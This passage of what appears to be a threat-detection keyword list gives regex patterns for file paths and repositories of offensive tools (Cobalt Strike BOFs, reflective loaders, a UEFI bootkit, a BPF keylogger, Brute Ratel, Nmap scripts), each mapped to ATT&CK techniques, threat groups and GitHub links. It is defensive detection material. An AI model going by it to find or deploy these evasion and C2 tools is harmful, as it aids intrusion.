- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*/BofRunner.cs*",".{0,1000}\/BofRunner\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/BOFs.git*",".{0,1000}\/BOFs\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 
- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/boko.py*",".{0,1000}\/boko\.py.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" 
"*/boku7/spawn*",".{0,1000}\/boku7\/spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/boku7/whereami/*",".{0,1000}\/boku7\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*/BokuLoader.c*",".{0,1000}\/BokuLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*/BokuLoader.h*",".{0,1000}\/BokuLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*/BokuLoader/*",".{0,1000}\/BokuLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*/BooExecutor.cs*",".{0,1000}\/BooExecutor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*/bootkit-rs*",".{0,1000}\/bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*/bpf-keylogger.git*",".{0,1000}\/bpf\-keylogger\.git.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*/bpf-keylogger/*",".{0,1000}\/bpf\-keylogger\/.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*/bq1iFEP2/assert/dll/*",".{0,1000}\/bq1iFEP2\/assert\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/bq1iFEP2/assert/exe/*",".{0,1000}\/bq1iFEP2\/assert\/exe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" 
"*/BRC4_rar",".{0,1000}\/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/breg.x64.o*",".{0,1000}\/breg\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*/breg.x86.o*",".{0,1000}\/breg\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes 
to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*/broadcast-ataoe-discover.nse*",".{0,1000}\/broadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-avahi-dos.nse*",".{0,1000}\/broadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-bjnp-discover.nse*",".{0,1000}\/broadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-db2-discover.nse*",".{0,1000}\/broadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dhcp6-discover.nse*",".{0,1000}\/broadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dhcp-discover.nse*",".{0,1000}\/broadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dns-service-discovery.nse*",".{0,1000}\/broadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-dropbox-listener.nse*",".{0,1000}\/broadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-eigrp-discovery.nse*",".{0,1000}\/broadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-hid-discoveryd.nse*",".{0,1000}\/broadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-igmp-discovery.nse*",".{0,1000}\/broadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-jenkins-discover.nse*",".{0,1000}\/broadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/broadcast-listener.nse*",".{0,1000}\/broadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 